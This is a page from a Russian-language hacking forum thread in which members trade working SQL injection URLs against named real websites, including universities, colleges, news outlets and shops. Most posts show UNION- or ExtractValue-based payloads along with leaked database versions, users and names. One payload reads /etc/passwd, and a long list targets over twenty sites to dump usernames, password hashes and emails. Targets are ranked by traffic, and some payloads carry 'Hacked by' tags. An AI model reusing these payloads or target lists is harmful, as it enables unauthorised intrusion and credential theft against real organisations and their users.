SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. HellFire

    HellFire Elder - Старейшина

    Joined:
    18 Jan 2009
    Messages:
    98
    Likes Received:
    78
    Reputations:
    40
    RETROCUSTOMSHOP – Авто ретро-кастом движение в России.

    Code:
    http://retrocustomshop.com/?page=item&id=1+UNION+SELECT+CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User())--
    Database Version: 5.1.49-rel11.3-log
    Database name: retrocustomshop
    User name: 043143006_rcs@localhost

    Вывод в коде.

    ТИЦ: 0
    PR: 1
     
    #15701 HellFire, 6 Jan 2014
    Last edited: 6 Jan 2014
  2. Timon132009

    Timon132009 Member

    Joined:
    7 Jun 2009
    Messages:
    137
    Likes Received:
    19
    Reputations:
    0
    Code:
    http://www.iop.vast.ac.vn/ccp/member.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55
    Code:
    http://www.skiallday.co.uk/shop/info.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),user(),database()),12,13,14,15,16
    Code:
    http://gdecarli.it/php/index.php?var1=1&var2=-1+union+select+1,2,concat_ws(0x3a,version(),user(),database())
     
    #15702 Timon132009, 8 Jan 2014
    Last edited: 9 Jan 2014
  3. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://consult.nida.ac.th/en/project_detail.php?id=-123+union+select+1,2,3,4,5,@@basedir,7,concat_ws(0x3a,version(),user(),database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
     
  4. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Тиц 2600
    Пр 6

    http://belapan.com/archive/2013/06/24/632924/'or(ExtractValue(1,concat(0x3a,(select(table_name)from(information_schema.tables)limit/**/0,1))))='1
     
    _________________________
  5. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Система Активной Реклам 10 тиц 1 пр

    Code:
    http://wrcbux.ru/forum_posts.php?th=0'+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4+--+
     
  6. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    [​IMG]
     
  7. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    http://www.skkdc.ru/index.php?mod=nov_pod&id=-77+union+select+1,user(),3,table_name,5,6,7+from+information_schema.tables
     
    1 person likes this.
  8. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Порнушка.

    5xxx.ru 95к трафа в сутки

    pornosector.ru 30к трафа в сутки

     
    _________________________
    1 person likes this.
  9. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://www.atlantic.edu/about/news/article.php?article=-1175+union+select+1,0x4861636b6564206279205365706f,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12--
     
  10. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://www.metz-handball.com/jeune.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,0x4861636b6564206279205365706f,5--
     
  11. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    http://seo-clic.besaba.com/forum_posts.php?th=0%27+union+select+1,version(),3,4+--+
     
  12. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Lenta.ru
    Тиц 23000
    1кк трафа в сутки

    http://strana.lenta.ru/latvia'or(ExtractValue(1,concat(0x3a,(select(load_file(0x2F6574632F706173737764))))))='1
     
    _________________________
    2 people like this.
  13. n3m1s

    n3m1s Banned

    Joined:
    28 Jul 2013
    Messages:
    20
    Likes Received:
    3
    Reputations:
    5
    Code:
    http://ua.nissan.ua/rus/media/show.php?a=cars&c_id=-1+union+select+1,2,3,concat(version(),0x3a,0x3a,user())--
    5.0.95-log::c13nissanua@localhost
     
    1 person likes this.
  14. danil7493

    danil7493 Member

    Joined:
    24 Jul 2011
    Messages:
    23
    Likes Received:
    7
    Reputations:
    10
    Code:
    http://www.pfa.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(username,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+jos_users--
    
    http://www.kubten.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(username,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+jos_users--
    
    http://www.agppk.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(username,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+jos_users--
    
    http://karasukpedcollege.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(username,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+jos_users--
    
    http://aist.pedcollege.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(username,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+jos_users--
    
    http://tm53.msk.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(username,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+jos_users--
    
    http://gbou-bpt.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(username,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+jos_users--
    
    http://www.volgmet.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(username,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+jos_users--
    
    http://www.gouspt.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(username,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+jos_users--
    
    http://www.detak.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(username,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+jos_users--
    
    http://college31.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(username,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+jos_users--
    
    http://www.kraspu19.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(username,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+jos_users--
    
    http://www.ymk-salekhard.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(username,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+jos_users--
    
    http://www.vozatt.ru/aist/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(username,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+jos_users--
    
    http://vket29.ru/aist/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(username,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+jos_users--
    
    http://rcstv.omgtu.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(username,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+jos_users--
    
    http://mpk1.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(username,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+jos_users--
    
    http://rcstv.omgtu.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(username,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+jos_users--
    
    
    http://www.rgpk-revda.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(username,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+jos_users--
    
    http://www.vil-kit.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(username,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+jos_users--
    
    http://www.rub-rpc.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(username,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+jos_users--
     
    #15714 danil7493, 24 Jan 2014
    Last edited: 24 Jan 2014
    2 people like this.
  15. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    file_priv=Y
    =================================================
     
    1 person likes this.
  16. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    socialblade.com Alexa-5k PR-5 >100к трафа
    Code:
    http://socialblade.com/digg/diggfpdata.php?id=20120329022427:465b6e9b-2d02-4f85-9395-abb5959da5cd%27%20UNION%20SELECT%201,2,3,4,5,6,7,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%23
    Code:
    5.5.35-0ubuntu0.12.04.1:digg@localhost:digg
     
    1 person likes this.
  17. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    afisha.ru

    Тиц 9400

     
    _________________________
    2 people like this.
  18. n3m1s

    n3m1s Banned

    Joined:
    28 Jul 2013
    Messages:
    20
    Likes Received:
    3
    Reputations:
    5
    [​IMG]

    Code:
    http://www.infiniti-taganka.ru/company/news.php?id=-36%27+union+select+1,2,3,4,concat(version(),0x203c666f6e7420636f6c6f723d7265643e3a3a3c2f666f6e743e20,user(),0x203c666f6e7420636f6c6f723d7265643e3a3a3c2f666f6e743e20,database(),0x203c666f6e7420636f6c6f723d7265643e3a3a3c2f666f6e743e20,0x203c623e3c666f6e7420636f6c6f723d7265643e6e336d31733c2f666f6e743e3c2f623e),6,7,8,9+--+
    5.5.35-0ubuntu0.13.10.1 :: mikle@localhost :: autocenter
     
    #15718 n3m1s, 30 Jan 2014
    Last edited: 30 Jan 2014
    1 person likes this.
  19. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://www.atlantic.edu/about/news/article.php?article=-1175+union+select+1,0x4861636b6564206279205365706f,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12--
     
  20. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    http://www.spin-spb.ru/item.php?code=-1266+union+select+1,@@version,3,4,5,6,7,8,9,10,11--

    5.5.35-0ubuntu0.12.04.2
     
Thread Status:
Not open for further replies.